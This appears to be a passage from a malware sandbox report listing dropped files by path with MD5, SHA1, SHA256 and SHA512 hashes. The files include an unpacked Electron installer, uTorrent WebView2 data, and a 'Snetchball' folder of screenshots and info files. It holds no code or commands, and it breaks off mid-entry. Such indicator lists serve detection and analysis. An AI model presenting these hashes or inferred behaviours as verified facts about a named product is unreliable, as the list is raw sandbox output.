MD5 a74821d5c2c02d9aa262dc72b6cf1911
SHA1 24832bac4e7a61a18f90f8c7b7eb4f663e69fb03
SHA256 1113b83c0d2d5c99bf5c53108a727f9c206d2d91c18e3f580096302ccac65759
SHA512 11d7b24fe25d6098ab1d1f9a47aad342c62258450b034953d98202b65595604be22ef8bfca87a119f260d8695053cb38c5e3ad69148c686abf316bc11d0a17c7

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\package.json

MD5 b283c7f78987e63deff47e8e68fdde18
SHA1 74e07bee138c27b3bed52e6d9c2995e7051a9839
SHA256 c0f85e9a52ef037c895af3e3e273203c6e66aafde5b21d7b4ccaa59c528466b2
SHA512 2156e352c9aa73748b4dde419c5354540dc8038157fe20d67659b2ba87da978503b163dfd5bb79311592e5f33e81919cfab196c93362c5b5f955b747da69a3e2

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\LICENSE

MD5 bc34f3691b4eca5f0d610b86df4bcc49
SHA1 50ff6b475320f09aaef69414444fdcfae0ed5bbf
SHA256 77cbd788d921cacb2eb6b35c96a37f6752a05c69884387a4e9b1588bacec8e4a
SHA512 56969e982af26270d6abd103189f231f0861df6e4a69161ce17955e4d640b411208e7036ad3e57f9f68864757463b8bab5cfdee2783cdedd5427738c3e016add

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\cjs\index.js

MD5 ece41ed6d058c862bba22867bdaa12cb
SHA1 1e00822db1c5a8de85b6b3e497fcf569adc26fc8
SHA256 d2db1f36e9d069d54872456569634b8214e640e44897e0c4a5e6823f25c69b40
SHA512 378aa89d9c9a587972ea62ed8da2142f7a96fefecd97e2e2c2002d4d8cb6dfb5c3c042ca5c1d8d62fb685a4cc5f50b6d1783cab2ebad9be923a46a04d6724043

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\cjs\files.js

MD5 a2499ef310f2378e744957a5649f6962
SHA1 83b485c059c1ea0364b8be12ff18fa1d2298038e
SHA256 a040cb2e6d52eeacbdc6670e9bb8d61125a1a0d3cc8a246d1ffaa7104d71af0a
SHA512 e13a0dbaa9d1ffe29c9cf0a8ebc78cccc79959cac4946d0c103a4f86dbf91d791a836c6f481e7445a75777ef2aaeee37a3b4857455fd772b4008c048cdc6d218

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\cjs\sea.js

MD5 5fc8d6611f3258b85460910458880c46
SHA1 e21c7c8dd842c6c9e59d6325d1ce492a94b11f48
SHA256 4f0c100a5b461edf0b815b1bcd03de8b662a41d7068b2d1ee8b5a318b160dcad
SHA512 fdeb9305baa76e66ae52cd05d02c3817c71735ea549655c5f8e6825f9483d6d8b9e8908e3d6281e63a7b77a1f3ce6e69877c90f581a0bbc07c2c2fef5ab605c0

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\cjs\sign-with-hook.js

MD5 9121bdd701b8d967e56e7e6ba9fe345d
SHA1 6bd8da612337c41da4fadf5e227968af529a077e
SHA256 d30bf8a77720752a4df5317d0b565e19031de2ec2ea40f1e8c63cc2c9dbe2f6e
SHA512 dcbfa44a32cec4a5bfe5b77d2014e74ec72602231b04f5b46bf6e661edbc29d99abf64373ba36ce658f24569c0275de86ca0ecbe3c851c3ace0105c4cc5456c7

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\cjs\sign-with-signtool.js

MD5 12d6723e655482827c2a02f8a205619c
SHA1 e79911927a8e5706c19a584e2278070961cef3d7
SHA256 a1e59ab82880ec3cd61d213e050f9e30c95110590be7ff897fd3ca7384230743
SHA512 24e136a6950cb317c6b1897d8d1346ebf451c788fa06d6dae6395d6fdb7bbcbd887917cddf9f9e3f0ec2dae8e95d7e723f12e7005945d8f867492627b7817ce7

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\cjs\sign.js

MD5 14d885dd19a03b7eb501c65516df98b0
SHA1 071ee89dfaf2e4a2da6bc999e17845eae67a7708
SHA256 a6eb4d9830b66c20c635118b33bf2f9ad831bd22326d6f85cb2bd8cf5cad3da4
SHA512 8726f8554720a7a58568e772c2a6e2eef13bda2fc6a8abf449ca8e7ac000dbe4bf95b02e28fb6f264151c0617ab9dfaa640db43b4723793ed27165d11aa6f0f5

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\cjs\spawn.js

MD5 2991663c49aee02ee0836d8eacc2463b
SHA1 e63c268b3218ee6d00f5781fc4500a645da4c952
SHA256 ab9e8531373743a574d92b9f6dfa99b77da2697053c347af61148772ce982b31
SHA512 f8946edbb0ab81ed362fd5048ec680d57799da399058837e9587e97ee445eb729837b8950bad592f05d8c8d44ea6b4403c0376661a5d508ed72c3d689df9dd7f

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\cjs\types.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\cjs\utils\parse-env.js

MD5 ef3bb27e8d016337acdc379366200594
SHA1 414291faaa14a749efe4781e8a081193a5678fe7
SHA256 c7a82b854746876019b27951503194bf813ff19276858aa584fd7ed835af6e43
SHA512 114f97a759de98b3830780a109ee0f09fe1b723d27bf645ddffc77dfa47fa472855d463a8930ed43e5fe390ed7f56a1ad6ec425cc5fd4e45ee1b09c964085c02

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\cjs\utils\log.js

MD5 197c7c358c3c5cfbe54fd4469aec13b7
SHA1 03d04b86a1bfd9bd34b29ee6b5fa88432747356a
SHA256 20c7b6e55c9b7b501ee102e38b8ce86b9344b35826eeabd3819132e3bb46734b
SHA512 4b131d90f07ae7f7f65abd0aac0816c81695802b5a9a2f09ce7c4d8999bf934489b48a8f080475fdd2bbb06fc6b56a3bb2956536fd22dc20342da0f14e1229c1

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\files.js

MD5 2e52c93c0c8832712657092f13ffa2fd
SHA1 e0d209137b9939b236d6e5b4ce5d87b817374725
SHA256 150779f6413fc3ac81841b35c4c69ee883b938c408a4f4949433d210b6998aec
SHA512 1d490048c8fd3781f39cddd52d7edc57b0409fbfd05585951459977d42849f7a85cf197874d6f47e3f40886a236b1f808462a8d4fa0ea9a572c45751f1da601c

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\index.js

MD5 7852c6eda5272f6a2d3834a044728761
SHA1 480f25c6998601a21bb996c44e2baedbec5f0878
SHA256 71155aec3e398d7fb2ba5d055aa75f922fafd84aa12a84e8483ee95c104f4fa1
SHA512 4e07d1ed505942741d9f02bc18ad94996eefaef522b88605aed0971830344875bafefdf4f337335cf7a4eb67d1b8ce9bb6958a709d37c01bb7bb09d99d0a2e05

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\sign.js

MD5 41acef3bc343bc6fdc5df20460994856
SHA1 565a284eaa399a492bdb019a78333c732167ae37
SHA256 a9f25e4e4fc0f01cd746e61c4cbdbde0d71cd4b1b9186656ac01fc57c6cc67df
SHA512 1c9bbbdd93379bcfbd4c7d9ed1a34aef2a9cf3448452eaf2ffe9b930414a12c47858a5e49f732905cbac01f058718cf81eadb29f968b418122badc224e8c6122

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\spawn.js

MD5 058908febe7f1beb6ce990d289b766a7
SHA1 8d5c962169fb4879e7eaac9cd3fcef4a174b61c5
SHA256 a0263de63771e9b4590442a4535339b4cb57c325bad590c7bea30c04613e1414
SHA512 661736efba25a89926bedb44d634fb57e87cd14837c1d28aa6242cf0df9e28a72f0ef0547d968373f6db769cbe24ab764a1ee4fb5ba8ed38334b88496d92f615

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\sign-with-signtool.js

MD5 2183ad5917703619ec9b5d87dd68126e
SHA1 e1f32300f9c6fda439dfeb77b38ac9d76201c1f2
SHA256 240eaa7c03c3c9764af1219f9f99c3b0ec180c2afa0d6f42b6ed5715bcafab39
SHA512 5f6fdbac98dd9f9c96b63f20c082561c86f18a45d0523e6eb0259e0f4c20b66cf1370a161b6d02be44c58ba1d6783e6a473660d833804b4bae10eac451e61f3a

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\utils\log.js

MD5 a8ecd28b44d210468df74828c800112e
SHA1 109fa8ac2da83561b3d47148a718bf80d2e02832
SHA256 57b371fee1b833f6c18d1df936f64cf564fb63895d2f60217a2166bd44103d3b
SHA512 ec63374bc383267a9a71c11b2581ec7f488406d3d507e57c4bdec8937f85e38def4bda68a629bba343a24accb56f7f3b0a1914d938f4533b4963e4fbf05a6b54

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\utils\parse-env.js

MD5 87c5db7b697a76d4fbda7ca705319aac
SHA1 89cd086e77397a4b96c9ac9d7666fdd324bdee40
SHA256 3d6d6a1ef07fa3428cf72cea25ea67ab145a21724befe6248dfb3e1e18313c91
SHA512 daf1ba7cd5ba89dd0e54669badd5755f4c5515731cdd85a7959d89f325c9f10c507df2159823994b4fbe9d5d75af4c2cd2e27342e53703dea0435b0c1c6e0c43

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\types.js

MD5 e2ebd7ddedcadeeadbf819c35985c768
SHA1 b878c11a77128e74c3cf15c93ef2ceddf2aa0b38
SHA256 8e609bb71c20b858c77f0e9f90bb1319db8477b13f9f965f1a1e18524bf50881
SHA512 4ee1c88f8c3f4e4cd34cb6c00339bf9d6d036ff4ade3af49e871cc8966b84c729d8b75492acc6413c9a664ac00a57958223ac13c4229da8c62ebe6a53e4f783f

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\sign-with-hook.js

MD5 e61157a045cf028cd2459c95bd74776d
SHA1 2f1a773570dd23bc48c99d0e8c84bd04abcd427c
SHA256 d8a2b4085231b0cb61a6c73587848819523bff8cb5adea609ca195b88ff066b7
SHA512 a6fabc1d2bd80d3e93bcb6b250b49595d808b1cb8ff0ae8a2bc00ee604b3dca13c1dab01b7d58e2047a5e0103f0d6023813a1e155b3907275d128f8082eb128e

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\sea.js

MD5 3b9bc17097569fb1c73a34aad6d7493b
SHA1 d4ea25c201d0ec0f586c57a631b600460d745aa8
SHA256 54de0c136c220c31661d671cce67c199441d6ebf2b828e60557fe7e0fa29967d
SHA512 fcf0ec09818f6f2deee69a753cb7cdf8fb0939930bc70d8f325f7fdbaba8e97ec5bad0687931ab3bdafd5b9029d1faa15748122540d358f2ce703b0a04d586ab

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\vendor\signtool.exe

MD5 8a90e91a512dbf56d0d8d87b9a673e53
SHA1 e7126fe4cdd96f12e5ca9ca3246a1b905c941a44
SHA256 a36f5e81ce208137acc8fa9c00547c020fa10f044583002ccd23799b7f64078e
SHA512 6df1da08a81c21710cfb483b48209dfbb3bb36ef146e366b384c3be1c7034d313a116a23b87b1f3c9fb0f24158472dc37119fe5139434bfea6a34dc7f03bfb0e

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\index.js

MD5 205563f976ffb7fd7c60fdccbd7794cb
SHA1 a9cbd89014771bd437ae84b743ce49fed48b86df
SHA256 b2735872b2a36b0b017b1a5fce226370d6836ec066316a0e559a2c118e0cfe49
SHA512 75ea5f90636a43ec56506cb732e4e7c4290cc8d9480adf97b6ddad2ab2efaf0dc19f5020e31fae44a2ae62e596ef8e34deb1481c9a33aa8d6e7d3651d90b9609

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\api-type-definitions.js

MD5 129e5004e0ed840ab3b24186cdd4f69b
SHA1 51f51579c886db83fe644ae2cac21703b5d0a54a
SHA256 a619729f84e068513ff1404465de35472ad41bd3b600633dc2f3174b477080c0
SHA512 f6be717157cd8ebf46d1a1ca5846c5e89ea2e5e391d858f9d1ad79540e4b269a1517f75542924793b8cf6c0488060ca128f5906e0204347b0117e0c7484d9320

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\package.json

MD5 8a4ecbdf0d7058f5ef4429104dd1759d
SHA1 d2d07582927f64747122d0d3abfc237e412495ee
SHA256 dfe0f59649ec2ab079e5f3e6925e96803541be5da2d5b71cab552edda5f4501a
SHA512 81f4a8145295e7ca33caa126a672a0c4b77d30ec43133a4dd94f3161d6b1a382d5fce0feba6ba8e9e2018f06e7461722aa9f25ebd9d9320a068c0c7ad4ed1de7

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\LICENSE

MD5 b87aed05aac36b36d87be98309779793
SHA1 eeaf2430cbadd5b0c24d636725211ddd7d71c662
SHA256 68bad23b0c3035bfdb255406410d03097dc08b0f6d59f9858497d276cd953ddb
SHA512 acf7b4a93d590041dccc81c25246bcc50b20f48b3000e7790485db765b579bb64c5cd57ab4395ff09fefce0a974792163bd9f3da525b8de4af65ce15b8f28dba

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\src\helpers.js

MD5 a5c7f3db1c46228f30018c2787572f74
SHA1 2c45d98220089aee6eae4674d7772fbeb1927f3a
SHA256 872ba81a1d5926e66a14423d4ff7b35e3642e01e400ee0959993a1bb479611fb
SHA512 30cf7ca7095a4fef898ac16d081c004ad2cbab3211cda1f418a8c5a683a2455fce36d900d1c8bf7e12d6636cc1d22dcc1f8646d14daec76706ec7a608d9757e6

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\src\library.js

MD5 93498067b3b914b7176330a9167e617f
SHA1 826ac9514406b30fc8912e15d34c65a7c96f7213
SHA256 cbcb0e1b0ffc0cc0a8544885917450e1ff1837a8ddcca1d6ab8592a6abf91d42
SHA512 a3ebc2c092d57639fd3e820fc7e621a50f2197c8d775d8919b5233a387172b58e207caf7208a93df1e88c01c7af25a4a27981d2e84ca758fedd3844345c504c2

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\src\validation.js

MD5 b3622888d64c18f4bc45fd57545f7011
SHA1 82220d864473a7c157e74a33fa58be817582e6f9
SHA256 0d5f434d82f6d2a1990fe475dc24bc42f1287b494869a3b39dfbee3c1d1fb1c6
SHA512 0e1ebdc4140070f86a5210461c2e425ec7423207e5c7eac4be2bd2524bfb7d217ab820dd3b58c67f7a8dc20779f0bb56f744848d43b18a4570df35b9ba5ca5be

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\src\windows.vbs

MD5 b18daa53f25929438a549ef5cef114e1
SHA1 8d08853cb9286b6f6efb9e2a403bdd1a9a7bf5d8
SHA256 1529bc4babe8b8f81945ec965390fe68e1df8ed806b492e878e910b1ef4e71d7
SHA512 a53c251cbfd4a8dbe6e8cb6ccfcf2937fd2295a49a388f0db412f6cf5a87a05b33965350c55860f7e6f7768b1f14dad9710017e62feab8bc695aed12c445272d

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\node\installArchSpecificPackage.js

MD5 c866a4c96aee99d0a42d8901ff6d4884
SHA1 185ceafd2e21a7b7f8c899767d1be1240a51ad38
SHA256 0cf2f8df7555a24f45bbfc8de7675867e00ecf6049582b3242aa62b3ac77e9ed
SHA512 9f2c9b47526589c59e9d4e1ae134ea620eb96c5ee8ff9484a7e3f71bccd9e3e3ddae71680b1a53f12d28030d453f4722531432080294ec85194af206a6215319

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\node\package.json

MD5 345417549e8927245f506f6635b35fbc
SHA1 b8f02589e8aa5068985354bc555841829685c544
SHA256 4c221d43891d7884132469aad770b890a801b686d6f95da324f9d9f7a1f08ffa
SHA512 8e408a37125b2016deec788bb42e7175f86d17377e98c7a3ac6ac0cde919793bf8e86e52ce4e440809e7fa98660a6807a2d59d1b8c966fcdb02ed910c9509ec2

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\node\bin\node

MD5 c0d2abf7d3fd5f932c06adf2d80efdff
SHA1 54d79709bcdab7157cee429192158de6cfe6f635
SHA256 1ac4ed15b141fd4e8684a12aa79f3c446df0bf41c237b83825170508c8843cce
SHA512 0242391b5b671c7b0533fd819c8775a5a3a739012d685552d86ed284468e1b5e4c4834116beae80c919393d4242f7fad21006295714530c1a18420100e564954

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\WinShell.dll

MD5 1cc7c37b7e0c8cd8bf04b6cc283e1e56
SHA1 0b9519763be6625bd5abce175dcc59c96d100d4c
SHA256 9be85b986ea66a6997dde658abe82b3147ed2a1a3dcb784bb5176f41d22815a6
SHA512 7acf7f8e68aa6066b59ca9f2ae2e67997e6b347bc08eb788d2a119b3295c844b5b9606757168e8d2fbd61c2cda367bf80e9e48c9a52c28d5a7a00464bfd2048f

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\b833acba66f1bb68_0

MD5 03dc14c85b6fddb8f69b8e31b0899e3c
SHA1 e2f6e9ac428d49bca338438c0a60409ff9b20757
SHA256 55f0f45abaa08321da4b7c19d8b0360e3b733ee63b71cf875c81a9050cb64352
SHA512 0da3a944110e0295beaae444346ac3993837624a483bd1529a2ea27c663a342357a704061773bee10ece48da141feee93ee3a281c99f619188300c1a16e29db9

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\2e947ec36d06ed69_0

MD5 c977737310398ecab055f829d9810762
SHA1 e6978aa934b3fc70830e494cedb5812d5a701d1d
SHA256 b0218928eee32b1a9eb9b6b09bb837b927ac64dd9b30210eaf1938ef114552f3
SHA512 b6df7abda70da46009933d2a1c0c49d5ebfacc943dcc012c5751b0cb87926c6af8002fef5ebf9c01abf75e821e484a16578349bba07814ac6a8bb270aa77267c

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 be0d5cce5b968628a89e272bca070b02
SHA1 a5de6222570f9924ea76bd2afa95e46d6e893161
SHA256 761b19171cf16e6168bda63762e137ae2bfffc8af7f72f1e28078b0b91db5c4c
SHA512 4c1f8da05d8e6b89f2005c3a5d4b1b03e0ce42e9e33e1d1c4ab71dcf223e205466f77225bcbaaa8605d602bb62635c621bca040a065211b97b89e108beb8b4e7

C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg

MD5 9920bc220833c651130c8e33263c4f62
SHA1 df6034f92eff435a02e9dd65c251772e32dec75f
SHA256 1361bc4b721e7419ff5592f74a1a33ea14cd8cefc57e04d02030e158774a0a00
SHA512 712dc1a710ac37d6440b463c39c9af9687d4afc7cba5630ac3eb1075012d29b035fe60b9eef4e6f9b06afb07479f227c35190bf61fd7ce7793c006f2bf5c2a79

memory/6344-5786-0x0000000008A80000-0x0000000008AF8000-memory.dmp

memory/6344-5787-0x000000000DBF0000-0x000000000E11C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity

MD5 993b94f52943ddef8e9c4cd6a216ef77
SHA1 ea81988113237fdac3744b0af007238c5f727f2d
SHA256 8a906a54aa7ebd177ee37e4529c0afb9af946233354254fa06f68c3efec563a4
SHA512 375b5d342c6d6d0c0b39cf46bded55fe920956f117eba954ce37f685c11cb1bfb2cc2aa2317b926fdecee6f5cdced97d5ce95b1eaa61117e09634806676a91bd

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 21bef19832227d1b0866e55400cf6fbe
SHA1 45d5db1e8f465e4db6b06bf9cd7ae8861502ab82
SHA256 07ad57d030141b02c9660566cbb9bedfccc5fc4e2f685525026a062a40fc2778
SHA512 b1796ac5e6495aacc1aa633614ff115ef3fc83ee49948b5ed4712725b4045a9c12c1e44179eaa483c3f7a91ba184cd17946ae8a72a53c6f7fd676f0fdc7cb9dd

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Network Persistent State

MD5 7df8b888f78bc30a65136cd3600af642
SHA1 c579cd4f6c0d657dfe6f2cdf8831097d54cb20c4
SHA256 bec8951727d6df6ff72d1e0a98f5dd031cabcc6a30645c22e05916f023026e17
SHA512 874c75f975db61670cf6f1dc7cfc556381ab8b5db56afbbd93090c2b5a99bbc2689001ee7d46f03a348b3cfc6c810d3cc6337a549f8d7670c2f2370dcfc24e55

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 d0e9cc8010f0766c244d7a837f9d8554
SHA1 84bb39717833532c6a0b843d04ed1436ad157357
SHA256 6c3c1ba48f822284e034c4c082930971bf24c8d9c0d688b58ca64d49d9bd644f
SHA512 92e58c6fa96265472e029113391799b577ebf723e5eb17faaa092163a023017dbb7a668678bd885ec6726170456ae369f2ea3df5449f191080d2c97592068357

C:\Users\Admin\AppData\Roaming\Snetchball\screen\screenshot.jpg

MD5 d2c64f98ead2e86c4929ac22d1753f20
SHA1 3d629c7af27030ed690e0eda36ab2635b1353dcb
SHA256 8757c4f0bbcc35213cf0cfab06fc9986351d9ecd4faf4c393c156b07d1c66d00
SHA512 7724331ad4ad67ef7b749c2926fad4da16606a5b3f7c44123781ec2f00f285e925e48a497a419518f49fdb0058aa556fda80c0d4502e2d9ab810b2790369537b

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 70679a4755c4e5a3d9c95e9e3005c3df
SHA1 dd0137836a4a977c3d4b9e1fdc475c033dff423a
SHA256 413af99c3db9c395e70a3457424915b128036e4405b38c23d179184fa55810ba
SHA512 149b0d9a830aa68ea36a3d52eb16eb4d2ff03fc565b87322a013f37ae33a51ffdbfedfcb313b9728f8303aab7f91ec2a0b3b5f1f3f84fb902b33d880704dd4f6

C:\Users\Admin\AppData\Roaming\utorrent\dht_feed.dat.new

MD5 d9180594744f870aeefb086982e980bb
SHA1 593b743b207e10ff55ec63e71a46c07909d0880a
SHA256 61098a4bf2a5e216533e5f2994d8f290308b310f2efa046548a96302afe412ea
SHA512 052d52f93faf4fa4037fc1e1cedec179253e47e3f2a11f7ef070fcfc393a7429dec341c46463b000d0a46f6d0e6de1325e1e43f7f01fe4605954df9035e0b080

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 438a6427de527ef4039416de599bdc42
SHA1 08a2ff8eaa42124c9d246fda4d7dbc7d35a5811c
SHA256 54218ac3ed7ee0e246dd9bf648f4d0373c3916da80ec8761b90a966e486c755f
SHA512 1ff1f47faeec7b9155a039793fc7a517436370175e5c97d8580a4a71eeb6e0219f30f7c5c62df960ff4f1ba333248dff7c20375b7aa353d4e82cabe424cc4d25

C:\Users\Admin\AppData\Roaming\Snetchball\images\2.jpg

MD5 9cc9d3031f4be34cf821d38341a7f302
SHA1 d92640fe44ac89d1f6d6ed741829c9aad300c3c7
SHA256 8ab030845ff1adb8dfac95142bf914023e61fb9747e2dea97fc1342308e0adc9
SHA512 eeb619233d15419ca2015e992c91f1ccbcd82e1c1208f79ca9b6b12ce4240d1120a78c5e08112e66aa85b20811e72dff62d6ee93aa67f250d775a76d84b18ad2

C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg

MD5 f5ee4e093c7a463f381eb1a8fb04808b
SHA1 47ababcd0523be7a62be4b5727c579df77eccf94
SHA256 fc9bbc845f4194b7d35d17a6e07b6d7acc5c86a517c87dbb01b7c3206d945825
SHA512 360fc92d7e914c28b3072e055a50aa8cb2d84bed3a1982d3442a5f4a21677de945d51abea92978d2aee7f227c58581ab921e9dc10e6f2af7d05164d85ffa70aa

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Network Persistent State

MD5 bfc554867a6eb1be04543ca35ccd6f22
SHA1 76f917c43a8e5987e7dd69dd78b1a0c2ee14e75b
SHA256 d4de1f03ed3b96ddd0743d4998f0567d57acfb48c983b8e7492e83041db23bc5
SHA512 7f5aa8be1f88043b39f7b65a70fd13f5d786bec8df4cb8aba6c93b3d244cfeed0c6d3e98c3cb727cb9a78e1401c3e09fa30ae060f4a6ccb76350969c32348471

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 38cab9c819e186f78bf35f42f51ef263
SHA1 37417c743ee16026f92c319746db5ff4fdbf169d
SHA256 309f2e69f9fb9631d2460fa191287a25b2d475f51860283b9cf8396506aebb44
SHA512 b4c5b81154bb6f590f83eb5de873155b1149a4056bee522f2d86267dba08f6a45c07a3157b4f7d64109f5bcc9e948de68b10b88cabb644b9c29e733ad387e9b5

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 9fda60ecca37b7fabec8226df10e22d5
SHA1 fc293e789cff1461b6caa37ef50986c50db2fd54
SHA256 c044ed4d7d134d4f32daa126c8a3205b1763fd028ad8250a164ed768814f7f10
SHA512 db5836615531070dcaa4ab26b8e9a5a8d68d6dfb0983965099cbd0fd3deefe1995dad255a861a5a6149f2086b94ac6af2b5e887605fbf55687556735efb09503

C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json

MD5 a02a54142af4311bc8dbe3268e3e3492
SHA1 bea3bcc0b248a2679b3acbbd631649e71b6e41f3
SHA256 82a03f00b1503e53922d77944d2cc2004249a97301560abbe1e7e6befa5d5961
SHA512 cff07ff3ca0697f36e3c6acbcb50c8a557c39b667eef9651b96940d60976b36c4431f7ddb6ccdee9020e96e93ba92b798d42ece3af517c4581d5feee79dc29b3

C:\Users\Admin\AppData\Roaming\Snetchball\screen\screenshot.png

MD5 e46f0f1068236a2de8d4979a335fcf53
SHA1 e0c4ad922f1919f08d1b05dafedbec3ba635cf62
SHA256 98d182b0524a5c793ba2e7efc7b2d26b081efa5d2115c76214fd1b4b49e2b067
SHA512 abc7516e3c308e62b6c491eb24d853fd12b2bd4f8b9ebf465f3fd5b18e6cdf8a84d5460a13d361cda9c3b93516edc325c7f5213dbccc71c53e58d59b6fb4d142

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 26838db620b2501dfd033377e4e18346
SHA1 bdcca811ed928ce1ea4f0c784fc6dac413b07395
